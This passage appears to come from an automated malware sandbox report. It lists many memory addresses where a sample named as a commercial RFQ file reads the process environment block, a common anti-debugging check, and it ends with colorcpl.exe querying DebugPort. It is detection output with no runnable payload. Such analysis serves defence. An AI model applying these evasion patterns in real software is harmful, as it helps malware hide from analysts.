      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov eax, dword ptr fs:[00000030h]2_2_33372755
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov ecx, dword ptr fs:[00000030h]2_2_33372755
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov eax, dword ptr fs:[00000030h]2_2_33372755
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33372755 mov eax, dword ptr fs:[00000030h]2_2_33372755
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A750 mov eax, dword ptr fs:[00000030h]2_2_3338A750
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FE750 mov eax, dword ptr fs:[00000030h]2_2_333FE750
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334F75B mov eax, dword ptr fs:[00000030h]2_2_3334F75B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338174A mov eax, dword ptr fs:[00000030h]2_2_3338174A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33383740 mov eax, dword ptr fs:[00000030h]2_2_33383740
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F7CF mov eax, dword ptr fs:[00000030h]2_2_3340F7CF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333507A7 mov eax, dword ptr fs:[00000030h]2_2_333507A7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE79D mov eax, dword ptr fs:[00000030h]2_2_333CE79D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33381796 mov eax, dword ptr fs:[00000030h]2_2_33381796
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33381796 mov eax, dword ptr fs:[00000030h]2_2_33381796
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B781 mov eax, dword ptr fs:[00000030h]2_2_3342B781
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B781 mov eax, dword ptr fs:[00000030h]2_2_3342B781
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333577F9 mov eax, dword ptr fs:[00000030h]2_2_333577F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333577F9 mov eax, dword ptr fs:[00000030h]2_2_333577F9
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333537E4 mov eax, dword ptr fs:[00000030h]2_2_333537E4
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E7E0 mov eax, dword ptr fs:[00000030h]2_2_3337E7E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341D7A7 mov eax, dword ptr fs:[00000030h]2_2_3341D7A7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341D7A7 mov eax, dword ptr fs:[00000030h]2_2_3341D7A7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341D7A7 mov eax, dword ptr fs:[00000030h]2_2_3341D7A7
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334217BC mov eax, dword ptr fs:[00000030h]2_2_334217BC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33350630 mov eax, dword ptr fs:[00000030h]2_2_33350630
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338F63F mov eax, dword ptr fs:[00000030h]2_2_3338F63F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338F63F mov eax, dword ptr fs:[00000030h]2_2_3338F63F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33380630 mov eax, dword ptr fs:[00000030h]2_2_33380630
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D8633 mov esi, dword ptr fs:[00000030h]2_2_333D8633
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D8633 mov eax, dword ptr fs:[00000030h]2_2_333D8633
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D8633 mov eax, dword ptr fs:[00000030h]2_2_333D8633
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FD62C mov ecx, dword ptr fs:[00000030h]2_2_333FD62C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FD62C mov ecx, dword ptr fs:[00000030h]2_2_333FD62C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FD62C mov eax, dword ptr fs:[00000030h]2_2_333FD62C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33357623 mov eax, dword ptr fs:[00000030h]2_2_33357623
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33355622 mov eax, dword ptr fs:[00000030h]2_2_33355622
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33355622 mov eax, dword ptr fs:[00000030h]2_2_33355622
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338C620 mov eax, dword ptr fs:[00000030h]2_2_3338C620
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333E3608 mov eax, dword ptr fs:[00000030h]2_2_333E3608
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337D600 mov eax, dword ptr fs:[00000030h]2_2_3337D600
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337D600 mov eax, dword ptr fs:[00000030h]2_2_3337D600
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338360F mov eax, dword ptr fs:[00000030h]2_2_3338360F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33424600 mov eax, dword ptr fs:[00000030h]2_2_33424600
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33350670 mov eax, dword ptr fs:[00000030h]2_2_33350670
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F607 mov eax, dword ptr fs:[00000030h]2_2_3340F607
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392670 mov eax, dword ptr fs:[00000030h]2_2_33392670
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392670 mov eax, dword ptr fs:[00000030h]2_2_33392670
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338666D mov esi, dword ptr fs:[00000030h]2_2_3338666D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338666D mov eax, dword ptr fs:[00000030h]2_2_3338666D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338666D mov eax, dword ptr fs:[00000030h]2_2_3338666D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33363660 mov eax, dword ptr fs:[00000030h]2_2_33363660
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33363660 mov eax, dword ptr fs:[00000030h]2_2_33363660
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33363660 mov eax, dword ptr fs:[00000030h]2_2_33363660
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33347662 mov eax, dword ptr fs:[00000030h]2_2_33347662
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33347662 mov eax, dword ptr fs:[00000030h]2_2_33347662
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33347662 mov eax, dword ptr fs:[00000030h]2_2_33347662
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338265C mov eax, dword ptr fs:[00000030h]2_2_3338265C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338265C mov ecx, dword ptr fs:[00000030h]2_2_3338265C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338265C mov eax, dword ptr fs:[00000030h]2_2_3338265C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33385654 mov eax, dword ptr fs:[00000030h]2_2_33385654
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335965A mov eax, dword ptr fs:[00000030h]2_2_3335965A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335965A mov eax, dword ptr fs:[00000030h]2_2_3335965A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33353640 mov eax, dword ptr fs:[00000030h]2_2_33353640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F640 mov eax, dword ptr fs:[00000030h]2_2_3336F640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F640 mov eax, dword ptr fs:[00000030h]2_2_3336F640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336F640 mov eax, dword ptr fs:[00000030h]2_2_3336F640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338C640 mov eax, dword ptr fs:[00000030h]2_2_3338C640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338C640 mov eax, dword ptr fs:[00000030h]2_2_3338C640
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D64A mov eax, dword ptr fs:[00000030h]2_2_3334D64A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334D64A mov eax, dword ptr fs:[00000030h]2_2_3334D64A
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341A6C0 mov eax, dword ptr fs:[00000030h]2_2_3341A6C0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33358690 mov eax, dword ptr fs:[00000030h]2_2_33358690
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DC691 mov eax, dword ptr fs:[00000030h]2_2_333DC691
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33360680 mov eax, dword ptr fs:[00000030h]2_2_33360680
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F68C mov eax, dword ptr fs:[00000030h]2_2_3340F68C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CC6F2 mov eax, dword ptr fs:[00000030h]2_2_333CC6F2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CC6F2 mov eax, dword ptr fs:[00000030h]2_2_333CC6F2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333496E0 mov eax, dword ptr fs:[00000030h]2_2_333496E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333496E0 mov eax, dword ptr fs:[00000030h]2_2_333496E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335C6E0 mov eax, dword ptr fs:[00000030h]2_2_3335C6E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333556E0 mov eax, dword ptr fs:[00000030h]2_2_333556E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333556E0 mov eax, dword ptr fs:[00000030h]2_2_333556E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333556E0 mov eax, dword ptr fs:[00000030h]2_2_333556E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333766E0 mov eax, dword ptr fs:[00000030h]2_2_333766E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333766E0 mov eax, dword ptr fs:[00000030h]2_2_333766E0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337D6D0 mov eax, dword ptr fs:[00000030h]2_2_3337D6D0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334186A8 mov eax, dword ptr fs:[00000030h]2_2_334186A8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_334186A8 mov eax, dword ptr fs:[00000030h]2_2_334186A8
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333506CF mov eax, dword ptr fs:[00000030h]2_2_333506CF
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333F86C2 mov eax, dword ptr fs:[00000030h]2_2_333F86C2
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33392539 mov eax, dword ptr fs:[00000030h]2_2_33392539
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33353536 mov eax, dword ptr fs:[00000030h]2_2_33353536
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33353536 mov eax, dword ptr fs:[00000030h]2_2_33353536
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334753F mov eax, dword ptr fs:[00000030h]2_2_3334753F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334753F mov eax, dword ptr fs:[00000030h]2_2_3334753F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334753F mov eax, dword ptr fs:[00000030h]2_2_3334753F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3341A553 mov eax, dword ptr fs:[00000030h]2_2_3341A553
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338F523 mov eax, dword ptr fs:[00000030h]2_2_3338F523
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B55F mov eax, dword ptr fs:[00000030h]2_2_3342B55F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3342B55F mov eax, dword ptr fs:[00000030h]2_2_3342B55F
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336252B mov eax, dword ptr fs:[00000030h]2_2_3336252B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33381527 mov eax, dword ptr fs:[00000030h]2_2_33381527
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DC51D mov eax, dword ptr fs:[00000030h]2_2_333DC51D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33371514 mov eax, dword ptr fs:[00000030h]2_2_33371514
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov ecx, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov ecx, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333FF51B mov eax, dword ptr fs:[00000030h]2_2_333FF51B
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3337E507 mov eax, dword ptr fs:[00000030h]2_2_3337E507
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338C50D mov eax, dword ptr fs:[00000030h]2_2_3338C50D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338C50D mov eax, dword ptr fs:[00000030h]2_2_3338C50D
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33352500 mov eax, dword ptr fs:[00000030h]2_2_33352500
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3334B502 mov eax, dword ptr fs:[00000030h]2_2_3334B502
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336C560 mov eax, dword ptr fs:[00000030h]2_2_3336C560
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3336E547 mov eax, dword ptr fs:[00000030h]2_2_3336E547
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33386540 mov eax, dword ptr fs:[00000030h]2_2_33386540
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33388540 mov eax, dword ptr fs:[00000030h]2_2_33388540
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3335254C mov eax, dword ptr fs:[00000030h]2_2_3335254C
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333545B0 mov eax, dword ptr fs:[00000030h]2_2_333545B0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333545B0 mov eax, dword ptr fs:[00000030h]2_2_333545B0
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333D85AA mov eax, dword ptr fs:[00000030h]2_2_333D85AA
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33382594 mov eax, dword ptr fs:[00000030h]2_2_33382594
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DC592 mov eax, dword ptr fs:[00000030h]2_2_333DC592
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE588 mov eax, dword ptr fs:[00000030h]2_2_333CE588
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333CE588 mov eax, dword ptr fs:[00000030h]2_2_333CE588
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A580 mov eax, dword ptr fs:[00000030h]2_2_3338A580
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3338A580 mov eax, dword ptr fs:[00000030h]2_2_3338A580
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33389580 mov eax, dword ptr fs:[00000030h]2_2_33389580
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_33389580 mov eax, dword ptr fs:[00000030h]2_2_33389580
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_333DC5FC mov eax, dword ptr fs:[00000030h]2_2_333DC5FC
      Source: C:\Users\user\Desktop\RFQINL0607_Commerical_list.exeCode function: 2_2_3340F582 mov eax, dword ptr fs:[00000030h]2_2_3340F582
      Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPortJump to behavior
